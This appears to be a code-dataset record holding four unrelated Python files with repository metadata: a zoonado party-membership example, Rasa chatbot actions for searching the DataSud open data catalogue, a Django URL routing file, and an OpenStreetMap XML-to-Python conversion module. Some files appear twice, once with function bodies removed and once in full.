cb06102f95e7da9c0e418bb9e327045e012a1497
[ "Apache-2.0" ]
16
2016-07-21T09:45:38.000Z
2017-09-22T19:06:14.000Z
examples/party.py
hulu316/zoonado
cb06102f95e7da9c0e418bb9e327045e012a1497
[ "Apache-2.0" ]
8
2016-07-21T09:06:37.000Z
2019-07-26T05:48:00.000Z
import logging import random from tornado import gen log = logging.getLogger() @gen.coroutine @gen.coroutine
23.685185
74
0.605942
import logging import random from tornado import gen log = logging.getLogger() def arguments(parser): parser.add_argument( "--workers", "-w", type=int, default=5, help="Number of workers to launch." ) parser.add_argument( "--znode-path", "-p", type=str, default="examplelock", help="ZNode path to use for the election." ) @gen.coroutine def run(client, args): log.info("Launching %d workers.", args.workers) yield client.start() yield [ worker(i, client, args) for i in range(args.workers) ] yield client.close() @gen.coroutine def worker(number, client, args): party = client.recipes.Party(args.znode_path, "worker_%d" % number) log.info("[WORKER #%d] Joining the party", number) yield party.join() for _ in range(10): log.info("[WORKER #%d] Members I see: %s", number, party.members) yield gen.sleep(.5) should_leave = random.choice([False, False, True]) if should_leave: log.info("[WORKER #%d] Leaving the party temporarily", number) yield party.leave() yield gen.sleep(1) log.info("[WORKER #%d] Rejoining the party", number) yield party.join() yield party.leave()
1,095
0
67
15674cff063c40fbe52c1f8ea5a648cc8e393e80
20,501
py
Python
custom-actions/actions/actions.py
moreymat/conciergerie-open-data
5d7575af93dd9d7f5e2c4bd35c2f6c816d3c3d33
[ "MIT" ]
null
null
null
custom-actions/actions/actions.py
moreymat/conciergerie-open-data
5d7575af93dd9d7f5e2c4bd35c2f6c816d3c3d33
[ "MIT" ]
3
2021-09-10T15:36:06.000Z
2021-10-06T08:27:57.000Z
custom-actions/actions/actions.py
moreymat/conciergerie-open-data
5d7575af93dd9d7f5e2c4bd35c2f6c816d3c3d33
[ "MIT" ]
null
null
null
# This files contains your custom actions which can be used to run # custom Python code. # # See this guide on how to implement these action: # https://rasa.com/docs/rasa/custom-actions import json import re import numpy as np from typing import Any, Text, Dict, List from datetime import datetime from actions import api_call from rasa_sdk import Action, Tracker from rasa_sdk.executor import CollectingDispatcher from rasa_sdk.events import SlotSet, EventType, FollowupAction keywords_delimitor = " |,|;|_|\|" def levenshtein_distance(string1, string2): """compute the levenshtein distance between two words""" distances = np.zeros((len(string1) + 1, len(string2) + 1)) for s1 in range(len(string1) + 1): distances[s1][0] = s1 for s2 in range(len(string2) + 1): distances[0][s2] = s2 a = 0 b = 0 c = 0 for s1 in range(1, len(string1) + 1): for s2 in range(1, len(string2) + 1): if string1[s1 - 1] == string2[s2 - 1]: distances[s1][s2] = distances[s1 - 1][s2 - 1] else: a = distances[s1][s2 - 1] b = distances[s1 - 1][s2] c = distances[s1 - 1][s2 - 1] if a <= b and a <= c: distances[s1][s2] = a + 1 elif b <= a and b <= c: distances[s1][s2] = b + 1 else: distances[s1][s2] = c + 1 return distances[len(string1)][len(string2)] def is_keyword_already_in_search( keyword, user_search_list, exp_terms, minimal_distance=1 ): """ Input: keyword: string user_search_list: list of string exp_terms: list of string minimal_distance: int (default to 1) Return True if there is a word in user_search_list or exp_terms that has a levenshtein distance of less or equal than minimal_distance with keyword Return False if not """ flag_already_suggested = False # Check the current word isn't already proposed (or a very similar word) for suggested_keyword in exp_terms: if levenshtein_distance(keyword.lower(), suggested_keyword) <= minimal_distance: flag_already_suggested = True # Check the current word isn't already entered by the user (or a very similar word) for user_keyword in user_search_list: if ( 
levenshtein_distance(keyword.lower(), user_keyword.lower()) <= minimal_distance ): flag_already_suggested = True return flag_already_suggested def get_keywords_expanded_list(keywords_expanded, user_search): """ Input: keywords_expanded: Output of the expansion API user_search: search entered by the user Output: A list of keywords to display to the user Order example: [barrage éolien] - take the first keyword for barrage from the referentiel - take the first keyword for barrage from the embeddings - take the first keyword for éolien from the referentiel - take the first keyword for éolien from the embeddings - take the second keyword for barrage from the referentiel [...] Ignore words that have a levenshtein distance of less than 1 to another word already in the list: mainly to prevent plural version """ user_search_list = re.split(keywords_delimitor, user_search) for i in range(len(user_search_list)): user_search_list[i] = user_search_list[i].lower() exp_terms = [] done = False index = 0 while not done and index < 25: done = True for og_key in keywords_expanded: # loop on original keywords # Take the n°index of the referentiel og_word = og_key["referentiel"]["tags"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split(keywords_delimitor, og_word[index]): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) # Take the n°index of the embeddings og_word = og_key["tree"][0]["similar_senses"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split( keywords_delimitor, og_word[index][0]["sense"] ): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) index += 1 return "|".join(exp_terms) def keyword_originating_from_og_key(keyword, og_key_tree): """ Input: keyword: A keyword proposed by the expansion API og_key_tree: A tree 
resulting from a keyword entered by the user Output: True if keyword was proposed because of its similarity with og_key_tree["original_keyword], False if not """ if og_key_tree["referentiel"]["tags"] is not None: for keyw in og_key_tree["referentiel"]["tags"]: if keyw == keyword: return True for sense in og_key_tree["tree"]: for similar_sense in sense["similar_senses"]: if similar_sense[0]["sense"] == keyword: return True return False def process_keyword_feedback(keyword_proposed, keywords_expanded, keywords_feedback): """ Input: keyword_proposed: A keyword proposed to the user keywords_expanded: Output of the API expansion (see API doc) keywords_feedback: List of keywords chosen by the user Output: original_keywords: list of keywords that resulted in the proposition of keyword by the API feedback: wether or not keyword_proposed was chosen by the user """ original_keywords = [] for og_key_tree in keywords_expanded: if keyword_originating_from_og_key(keyword_proposed, og_key_tree): original_keywords.append(og_key_tree["original_keyword"]) if keyword_proposed in keywords_feedback: feedback = 1 else: feedback = -1 return original_keywords, feedback class ResetKeywordsSlot(Action): """ Reset all the slots of the rasa chatbot """ class AskForKeywordsFeedbackSlotAction(Action): """ Ask the user to choose which keywords are useful to him during the search_form """ class SearchKeywordsInDatabase(Action): """ Search DataSud API with keywords provided by the users and display results """ class SendSearchInfo(Action): """ Send search information to the database """ class SendKeywordsFeedback(Action): """ Send keywords proposed to the user to the database """ class FeedbackProposition(Action): """ If we found results, ask the user if he wants to give feedback """ class AskForResultsFeedbackSlotAction(Action): """ Ask the user to choose which results were useful to him """ class RecapResultsFeedback(Action): """ Feedback format example: 0 2 1 Summarize the feedback to the user 
""" class InitialMessage(Action): """ First message sent to user by chatbot """ class SetDatasudFlag(Action): """ Set has_asked_datasud_flag to True """ class SetCUFlag(Action): """ Set has_asked_cu_flag to True """ class AnythingElse(Action): """ Message sent to user to ask if he needs anything else """ class SendResultsFeedback(Action): """ Feedback format example: 0 3 4 Send Search results feedback to the database """ class ProposeAlternativeSearch(Action): """ Let the user know what he can do if he didn't what he needed via the chatbot. """
30.875
174
0.588801
# This files contains your custom actions which can be used to run # custom Python code. # # See this guide on how to implement these action: # https://rasa.com/docs/rasa/custom-actions import json import re import numpy as np from typing import Any, Text, Dict, List from datetime import datetime from actions import api_call from rasa_sdk import Action, Tracker from rasa_sdk.executor import CollectingDispatcher from rasa_sdk.events import SlotSet, EventType, FollowupAction keywords_delimitor = " |,|;|_|\|" def levenshtein_distance(string1, string2): """compute the levenshtein distance between two words""" distances = np.zeros((len(string1) + 1, len(string2) + 1)) for s1 in range(len(string1) + 1): distances[s1][0] = s1 for s2 in range(len(string2) + 1): distances[0][s2] = s2 a = 0 b = 0 c = 0 for s1 in range(1, len(string1) + 1): for s2 in range(1, len(string2) + 1): if string1[s1 - 1] == string2[s2 - 1]: distances[s1][s2] = distances[s1 - 1][s2 - 1] else: a = distances[s1][s2 - 1] b = distances[s1 - 1][s2] c = distances[s1 - 1][s2 - 1] if a <= b and a <= c: distances[s1][s2] = a + 1 elif b <= a and b <= c: distances[s1][s2] = b + 1 else: distances[s1][s2] = c + 1 return distances[len(string1)][len(string2)] def is_keyword_already_in_search( keyword, user_search_list, exp_terms, minimal_distance=1 ): """ Input: keyword: string user_search_list: list of string exp_terms: list of string minimal_distance: int (default to 1) Return True if there is a word in user_search_list or exp_terms that has a levenshtein distance of less or equal than minimal_distance with keyword Return False if not """ flag_already_suggested = False # Check the current word isn't already proposed (or a very similar word) for suggested_keyword in exp_terms: if levenshtein_distance(keyword.lower(), suggested_keyword) <= minimal_distance: flag_already_suggested = True # Check the current word isn't already entered by the user (or a very similar word) for user_keyword in user_search_list: if ( 
levenshtein_distance(keyword.lower(), user_keyword.lower()) <= minimal_distance ): flag_already_suggested = True return flag_already_suggested def get_keywords_expanded_list(keywords_expanded, user_search): """ Input: keywords_expanded: Output of the expansion API user_search: search entered by the user Output: A list of keywords to display to the user Order example: [barrage éolien] - take the first keyword for barrage from the referentiel - take the first keyword for barrage from the embeddings - take the first keyword for éolien from the referentiel - take the first keyword for éolien from the embeddings - take the second keyword for barrage from the referentiel [...] Ignore words that have a levenshtein distance of less than 1 to another word already in the list: mainly to prevent plural version """ user_search_list = re.split(keywords_delimitor, user_search) for i in range(len(user_search_list)): user_search_list[i] = user_search_list[i].lower() exp_terms = [] done = False index = 0 while not done and index < 25: done = True for og_key in keywords_expanded: # loop on original keywords # Take the n°index of the referentiel og_word = og_key["referentiel"]["tags"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split(keywords_delimitor, og_word[index]): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) # Take the n°index of the embeddings og_word = og_key["tree"][0]["similar_senses"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split( keywords_delimitor, og_word[index][0]["sense"] ): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) index += 1 return "|".join(exp_terms) def keyword_originating_from_og_key(keyword, og_key_tree): """ Input: keyword: A keyword proposed by the expansion API og_key_tree: A tree 
resulting from a keyword entered by the user Output: True if keyword was proposed because of its similarity with og_key_tree["original_keyword], False if not """ if og_key_tree["referentiel"]["tags"] is not None: for keyw in og_key_tree["referentiel"]["tags"]: if keyw == keyword: return True for sense in og_key_tree["tree"]: for similar_sense in sense["similar_senses"]: if similar_sense[0]["sense"] == keyword: return True return False def process_keyword_feedback(keyword_proposed, keywords_expanded, keywords_feedback): """ Input: keyword_proposed: A keyword proposed to the user keywords_expanded: Output of the API expansion (see API doc) keywords_feedback: List of keywords chosen by the user Output: original_keywords: list of keywords that resulted in the proposition of keyword by the API feedback: wether or not keyword_proposed was chosen by the user """ original_keywords = [] for og_key_tree in keywords_expanded: if keyword_originating_from_og_key(keyword_proposed, og_key_tree): original_keywords.append(og_key_tree["original_keyword"]) if keyword_proposed in keywords_feedback: feedback = 1 else: feedback = -1 return original_keywords, feedback class ResetKeywordsSlot(Action): """ Reset all the slots of the rasa chatbot """ def name(self): return "action_reset_all_slots" def run(self, dispatcher, tracker, domain): return [ SlotSet("keywords", None), SlotSet("keywords_expanded", None), SlotSet("keywords_feedback", None), SlotSet("results", None), SlotSet("results_feedback", None), SlotSet("search_target_feedback", None), ] class AskForKeywordsFeedbackSlotAction(Action): """ Ask the user to choose which keywords are useful to him during the search_form """ def name(self) -> Text: return "action_ask_keywords_feedback" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict ) -> List[EventType]: user_search = tracker.get_slot("keywords") keywords_expanded = api_call.get_keywords_expansion_query( user_search, [{"name": "datasud", "type": 
"tags"}] ) keywords_expanded_list = get_keywords_expanded_list( keywords_expanded, user_search ) if len(keywords_expanded_list) > 0: keywords = [ {"content_type": "text", "title": x, "payload": "k" + str(i)} for i, x in enumerate( re.split(keywords_delimitor, keywords_expanded_list) ) ] # Le custom payload est détecté comme un texte, donc j'ajoute un type qui permet facilement de détecter que c'est un un custom payload au niveau du widget payload = { "type": "custom_payload_keywords", "text": "Voici quelques mots-clés supplémentaires. Cliquez sur ceux qui vous semblent pertinents, puis appuyez sur entrée, pour approfondir votre recherche.", "nb_max_keywords": 8, "keywords": keywords, } dispatcher.utter_message(json.dumps(payload)) return [ SlotSet("keywords_expanded", keywords_expanded), SlotSet("keywords_proposed", keywords_expanded_list), ] else: return [ SlotSet("keywords_expanded", ""), SlotSet("keywords_proposed", ""), SlotSet("keywords_feedback", ""), SlotSet("requested_slot", None), ] class SearchKeywordsInDatabase(Action): """ Search DataSud API with keywords provided by the users and display results """ def name(self): return "action_search_database" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: keywords = tracker.get_slot("keywords") conversation_id = tracker.sender_id keywords_feedback = tracker.get_slot("keywords_feedback") results = api_call.get_results_from_keywords(keywords, keywords_feedback, 5) reranking_data = [] reranking_data.append({"api_hostname": "datasud", "results_list": results}) catalog_url = "https://trouver.datasud.fr/dataset/" if len(results) > 0: results = api_call.get_search_reranking_query( conversation_id, keywords, reranking_data ) results_payload = [] for i, result in enumerate(results[0:5]): results_payload.append( { "title": result["title"], "author": result["owner_org"], "url": catalog_url + result["url"], "description": result["description"], } ) 
dispatcher.utter_message(text="Voici les résultats que j'ai pu trouver :") payload = { "type": "custom_payload_results_display", "nb_max_results": 5, "results": results_payload, } dispatcher.utter_message(json.dumps(payload)) return [ SlotSet("results", results), ] else: dispatcher.utter_message( text="Je suis désolé, je n'ai trouvé aucun résultat pour votre recherche." ) return [ SlotSet("results", None), ] class SendSearchInfo(Action): """ Send search information to the database """ def name(self): return "action_send_search_information_to_API" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: date = datetime.now().strftime("%Y-%m-%d %H:%M:%S") api_call.add_expansion_search_query( tracker.sender_id, tracker.get_slot("keywords"), date ) api_call.add_reranking_search_query( tracker.sender_id, tracker.get_slot("keywords"), date ) class SendKeywordsFeedback(Action): """ Send keywords proposed to the user to the database """ def name(self): return "action_send_keywords_feedback_to_expansion_API" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: keywords_expanded = tracker.get_slot("keywords_expanded") keywords_proposed = tracker.get_slot("keywords_proposed") keywords_feedback = tracker.get_slot("keywords_feedback") feedbacks_list = [] if keywords_proposed is not None and keywords_feedback is not None: keywords_proposed = re.split(keywords_delimitor, keywords_proposed) keywords_feedback = re.split(keywords_delimitor, keywords_feedback) for keyword in keywords_proposed: original_keywords, feedback = process_keyword_feedback( keyword, keywords_expanded, keywords_feedback ) for og_keyword in original_keywords: feedbacks_list.append( { "original_keyword": og_keyword, "proposed_keyword": keyword, "feedback": feedback, } ) api_call.add_expansion_feedback_query( tracker.sender_id, tracker.get_slot("keywords"), feedbacks_list ) class 
FeedbackProposition(Action): """ If we found results, ask the user if he wants to give feedback """ def name(self): return "action_feedback_proposition" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: yesnoButtons = [ {"payload": "/affirm", "title": "Oui !"}, {"payload": "/deny", "title": "Non merci",}, ] results = tracker.get_slot("results") if results != None and len(results) > 0: dispatcher.utter_message( text="Seriez-vous d'accord de prendre quelques secondes de votre temps pour m'aider à m'améliorer ?", buttons=yesnoButtons, ) else: # return {"event": "followup", "name": "action_recap_feedback_to_user"} return [FollowupAction("utter_submit_feedback_form")] class AskForResultsFeedbackSlotAction(Action): """ Ask the user to choose which results were useful to him """ def name(self) -> Text: return "action_ask_results_feedback" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict ) -> List[EventType]: results = tracker.get_slot("results") feedback_payload = [] catalog_url = "https://trouver.datasud.fr/dataset/" for i, result in enumerate(results[0:5]): feedback_payload.append( { "title": result["title"], "author": result["owner_org"], "url": catalog_url + result["url"], "description": result["description"], } ) dispatcher.utter_message( text="Veuillez cocher les résultats qui vous ont étés utiles :" ) payload = { "type": "custom_payload_feedbacks_display", "nb_max_feedbacks": 5, "feedbacks": feedback_payload, } dispatcher.utter_message(json.dumps(payload)) class RecapResultsFeedback(Action): """ Feedback format example: 0 2 1 Summarize the feedback to the user """ def name(self): return "action_recap_feedback_to_user" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: dispatcher.utter_message(text="Merci beaucoup pour votre retour !") class InitialMessage(Action): """ First message sent to user by 
chatbot """ def name(self): return "action_initial_message" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: propositions = [ {"payload": "/request_search", "title": "Je recherche des données."}, { "payload": "/ask_datasud", "title": "J'aimerais en savoir plus sur Datasud.", }, { "payload": "/ask_cu", "title": "Je voudrais connaître les conditions d'utilisation.", }, {"payload": "/goodbye", "title": "Je n'ai besoin de rien."}, ] dispatcher.utter_message( text="Bonjour, comment puis-je vous aider ?", buttons=propositions ) class SetDatasudFlag(Action): """ Set has_asked_datasud_flag to True """ def name(self): return "action_set_datasud_flag" def run(self, dispatcher, tracker, domain): return [ SlotSet("has_asked_datasud_flag", True), ] class SetCUFlag(Action): """ Set has_asked_cu_flag to True """ def name(self): return "action_set_cu_flag" def run(self, dispatcher, tracker, domain): return [ SlotSet("has_asked_cu_flag", True), ] class AnythingElse(Action): """ Message sent to user to ask if he needs anything else """ def name(self): return "action_anything_else" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: has_asked_datasud_flag = tracker.get_slot("has_asked_datasud_flag") has_asked_cu_flag = tracker.get_slot("has_asked_cu_flag") propositions = [] propositions.append( {"payload": "/request_search", "title": "Je recherche des données."} ) if not has_asked_datasud_flag: propositions.append( { "payload": "/ask_datasud", "title": "J'aimerais en savoir plus sur Datasud.", } ) if not has_asked_cu_flag: propositions.append( { "payload": "/ask_cu", "title": "Je voudrais connaître les conditions d'utilisation.", } ) propositions.append({"payload": "/goodbye", "title": "Je n'ai besoin de rien."}) dispatcher.utter_message( text="Avez-vous besoin d'autre chose ?", buttons=propositions ) class SendResultsFeedback(Action): """ 
Feedback format example: 0 3 4 Send Search results feedback to the database """ def name(self): return "action_send_results_feedback_to_reranking_API" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: conversation_id = tracker.sender_id user_search = tracker.get_slot("keywords") results = tracker.get_slot("results") search_target_feedback = tracker.get_slot("search_target_feedback") results_feedback = tracker.get_slot("results_feedback") if results_feedback is not None: results_feedback = results_feedback.split(" ") else: results_feedback = [] feedbacks_list = [] if results is not None and len(results) > 0: if len(results_feedback) > 0: for i, result in enumerate(results): if str(i) in results_feedback: feedbacks_list.append({"result": result, "feedback": 1}) else: feedbacks_list.append({"result": result, "feedback": -1}) else: for i, result in enumerate(results): feedbacks_list.append({"result": result, "feedback": 0}) api_call.add_reranking_feedback_query( conversation_id, user_search, search_target_feedback, feedbacks_list, ) class ProposeAlternativeSearch(Action): """ Let the user know what he can do if he didn't what he needed via the chatbot. """ def name(self): return "action_data_not_found" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: user_search = tracker.get_slot("keywords") print(keywords_delimitor, user_search) classic_search_link = "https://trouver.datasud.fr/dataset?q=" + "&&".join( re.split(keywords_delimitor, user_search) ) dispatcher.utter_message( response="utter_data_not_found", classic_search_link=classic_search_link ) dispatcher.utter_message(response="utter_contact_datasud")
11,868
0
756
8b90a4f43bd5093ec4d3568f8c57eccff8dc5136
1,580
py
Python
ea_makers_be/ea_makers_app/urls.py
kimtuan1102/ea_makers_be
509b21bc2b444bfe5be252acbbc4340be2439104
[ "MIT" ]
null
null
null
ea_makers_be/ea_makers_app/urls.py
kimtuan1102/ea_makers_be
509b21bc2b444bfe5be252acbbc4340be2439104
[ "MIT" ]
1
2021-06-10T23:12:09.000Z
2021-06-10T23:12:09.000Z
ea_makers_be/ea_makers_app/urls.py
kimtuan1102/ea_makers_be
509b21bc2b444bfe5be252acbbc4340be2439104
[ "MIT" ]
null
null
null
from django.urls import path, include from rest_framework.routers import DefaultRouter from .views import TransactionViewSet, AccountMT4ViewSet, AccountHistoryViewSet, \ AccountConfigViewSet, transaction_approve, transaction_reject, user_info, ea_license, PackageViewSet, \ ServerInfoViewSet, account_config_admin_approve, create_order, \ account_config_superadmin_approve, OfficeViewSet, extension_order, license_time, \ guarantee_time, ChangePasswordView router = DefaultRouter() router.register(r'transaction', TransactionViewSet) router.register(r'account-mt4', AccountMT4ViewSet) router.register(r'account-history', AccountHistoryViewSet) router.register(r'account-config', AccountConfigViewSet) router.register(r'package', PackageViewSet) router.register(r'server-info', ServerInfoViewSet) router.register(r'office', OfficeViewSet) urlpatterns = [ path('api/', include(router.urls)), path(r'api/transaction/approve/<int:id>', transaction_approve), path(r'api/transaction/reject/<int:id>', transaction_reject), path(r'api/user-info', user_info), path(r'api/ea-license/<int:id>', ea_license), path(r'api/account-config/admin-approve/<int:id>', account_config_admin_approve), path(r'api/account-config/superadmin-approve/<int:id>', account_config_superadmin_approve), path(r'api/create-order', create_order), path(r'api/extension-order/<int:id>', extension_order), path(r'api/license-time', license_time), path(r'api/guarantee-time', guarantee_time), path(r'api/change-password', ChangePasswordView.as_view()) ]
50.967742
107
0.779114
from django.urls import path, include from rest_framework.routers import DefaultRouter from .views import TransactionViewSet, AccountMT4ViewSet, AccountHistoryViewSet, \ AccountConfigViewSet, transaction_approve, transaction_reject, user_info, ea_license, PackageViewSet, \ ServerInfoViewSet, account_config_admin_approve, create_order, \ account_config_superadmin_approve, OfficeViewSet, extension_order, license_time, \ guarantee_time, ChangePasswordView router = DefaultRouter() router.register(r'transaction', TransactionViewSet) router.register(r'account-mt4', AccountMT4ViewSet) router.register(r'account-history', AccountHistoryViewSet) router.register(r'account-config', AccountConfigViewSet) router.register(r'package', PackageViewSet) router.register(r'server-info', ServerInfoViewSet) router.register(r'office', OfficeViewSet) urlpatterns = [ path('api/', include(router.urls)), path(r'api/transaction/approve/<int:id>', transaction_approve), path(r'api/transaction/reject/<int:id>', transaction_reject), path(r'api/user-info', user_info), path(r'api/ea-license/<int:id>', ea_license), path(r'api/account-config/admin-approve/<int:id>', account_config_admin_approve), path(r'api/account-config/superadmin-approve/<int:id>', account_config_superadmin_approve), path(r'api/create-order', create_order), path(r'api/extension-order/<int:id>', extension_order), path(r'api/license-time', license_time), path(r'api/guarantee-time', guarantee_time), path(r'api/change-password', ChangePasswordView.as_view()) ]
0
0
0
c84be1fd2203937f1b01a3ed6d022fb5c41f653d
14,418
py
Python
osmdigest/pythonify.py
MatthewDaws/OSMDigest
aba65c4bf28b14e123711f760bf0baf1be2e82c5
[ "MIT" ]
null
null
null
osmdigest/pythonify.py
MatthewDaws/OSMDigest
aba65c4bf28b14e123711f760bf0baf1be2e82c5
[ "MIT" ]
null
null
null
osmdigest/pythonify.py
MatthewDaws/OSMDigest
aba65c4bf28b14e123711f760bf0baf1be2e82c5
[ "MIT" ]
null
null
null
""" pythonify ~~~~~~~~ Converts an OSM XML file into a number of Python dictionaries. This process is slow, and (very) memory intensive, so can be split into a number of parts. We also support saving and loading the results from compressed pickle'd files (these should be viewed a temporary files, which are unlikely to be compatible across different Python runtime systems.) """ from . import digest as _digest import pickle as _pickle import lzma as _lzma import array as _array import bisect as _bisect from collections import defaultdict as _defaultdict def unpickle(filename): """Load an object from a .xz compressed pickle file.""" with _lzma.open(filename, "rb") as file: return _pickle.load(file) def pickle(object, filename): """Save an object to a .xz compressed pickle file.""" with _lzma.open(filename, "wb") as file: return _pickle.dump(object, file) class Nodes(): """Extracts the coordinate data (only) for the nodes. Stores data in a dictionary. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ class NodesPacked(): """A more efficient storage method than the :class:`Nodes` implements, but at the cost of slower querying. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. 
""" @staticmethod @staticmethod @staticmethod def from_Nodes(nodes): """Construct a new instance from an instance of :class:`Nodes`.""" new = NodesPacked(None) interim_list = [ (osm_id, lon, lat) for osm_id, (lon, lat) in nodes._nodes.items() ] new._osm_ids, new._longitude, new._latitude = NodesPacked._arrays_from_unordered_list(interim_list) return new class Ways(): """Extracts (only) the list of nodes for each way. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ class Relations(): """Extracts (only) the list of members of each relation. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ class Tags(): """Stores all the tags in a lookup optimised for finding the objects (nodes, ways and relations) which have a given tag. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. 
""" @staticmethod @staticmethod @property def all_node_tags(self): """Set of all `(key, value)` pairs of tags of nodes.""" return set(self.from_nodes) @property def all_node_tag_keys(self): """Set of all keys which occur on tags of nodes.""" return set(k for (k,v) in self.from_nodes) @property def all_way_tags(self): """Set of all `(key, value)` pairs of tags of ways.""" return set(self.from_ways) @property def all_way_tag_keys(self): """Set of all keys which occur on tags of ways.""" return set(k for (k,v) in self.from_ways) @property def all_relation_tags(self): """Set of all `(key, value)` pairs of tags of relations.""" return set(self.from_relations) @property def all_relation_tag_keys(self): """Set of all keys which occur on tags of relations.""" return set(k for (k,v) in self.from_relations) def from_key_value(self, key, value): """Return a list of all element which have the tag `{key: value}`. :param key: The key to search for tags with. :param value: The value to search for tags with. :return: A list of pairs `(typename, osm_id)` where `typename` is one of "node", "way" or "relation" and `osm_id` is the id of the element. """ out = [] for osm_id in self.nodes((key, value)): out.append(("node", osm_id)) for osm_id in self.ways((key, value)): out.append(("way", osm_id)) for osm_id in self.relations((key, value)): out.append(("relation", osm_id)) return out def from_key(self, key): """Return a list of all element which have the tag `key`. :param key: The key to search for tags with. :return: A list of triple `(typename, value, osm_id)` where `typename` is one of "node", "way" or "relation", `value` is the value of the tag, and `osm_id` is the id of the element. 
""" out = [] for value, osm_id in self.nodes_from_key(key): out.append(("node", value, osm_id)) for value, osm_id in self.ways_from_key(key): out.append(("way", value, osm_id)) for value, osm_id in self.relations_from_key(key): out.append(("relation", value, osm_id)) return out def nodes(self, key_pair): """Returns a list of all the nodes which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of nodes with this tag. """ return self._by_key_pair(self.from_nodes, key_pair) def nodes_from_key(self, key): """Returns a list of all the nodes which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the node. """ return self._by_key(self.from_nodes, key) def ways(self, key_pair): """Returns a list of all the ways which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of ways with this tag. """ return self._by_key_pair(self.from_ways, key_pair) def ways_from_key(self, key): """Returns a list of all the ways which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the way. """ return self._by_key(self.from_ways, key) def relations(self, key_pair): """Returns a list of all the relations which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of relations with this tag. """ return self._by_key_pair(self.from_relations, key_pair) def relations_from_key(self, key): """Returns a list of all the relations which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the relation. 
""" return self._by_key(self.from_relations, key) class TagsById(): """A lookup from osm id number to tags. :param tags: An instance of :class:`Tags`. """ @staticmethod def node(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._nodes: return self._nodes[osm_id] return dict() def way(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._ways: return self._ways[osm_id] return dict() def relation(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._relations: return self._relations[osm_id] return dict() def pythonify_and_pickle(file, out_filename): """Convert all the data in the XML file and save as pickled files for nodes, ways, relations and tags separately. :param file: Filename (the file will be opened 4 times, so passing a file object will not work). Can be anything which :module:`digest` can parse. :param out_filename: If is `test` then writes files `test_nodes.pic.xz` through `test_tags.pic.xz` :return: A tuple of the 4 output filenames for nodes, ways, relations and tags. """ obj = NodesPacked(file) out = [out_filename + "_nodes.pic.xz"] pickle(obj, out[0]) for typpe, name in [(Ways, "ways"), (Relations, "relations"), (Tags, "tags")]: obj = None obj = typpe(file) name = "{}_{}.pic.xz".format(out_filename, name) pickle(obj, name) out.append(name) return out
36.593909
107
0.608337
